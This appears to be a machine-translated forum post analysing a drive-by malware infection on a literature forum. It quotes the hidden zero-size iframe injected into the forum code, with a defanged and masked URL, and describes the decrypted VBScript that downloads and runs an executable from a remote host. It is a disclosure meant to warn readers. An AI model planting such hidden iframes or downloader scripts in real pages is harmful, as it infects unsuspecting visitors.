The horse hanging on the literature forum is changed to worm. win32.agent. IMH.
EndurerOriginal
1Version
Worm. win32.agent. IPI/Trojan. win32.agent. AVT
I accidentally went in again. Kabbah didn't respond ~
A netizen just entered said rising found and cleared threeWorm. win32.agent. IMH, All in the IE cache, and the file name is ga1_1cmd.exe.
Check ForumCode, Found:
/---
<IFRAME src = "hxxp: // www. yo * y * O5 ** 9.com/m000068.htm? Id = 907 "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
Hxxp: // www. yo * y * O5 ** 9.com/m?68.htm? Id = 907Contains script code. The function is to use customAlgorithmDecrypt and output the value of variable S.
The value of the decrypted variable S is a VBScript. The function is to downloadHxxp: // X *** XT * vb.cn/arp/ga.exeAnd run.
But I cannot download ga.exe, so it's no wonder Kabbah didn't respond.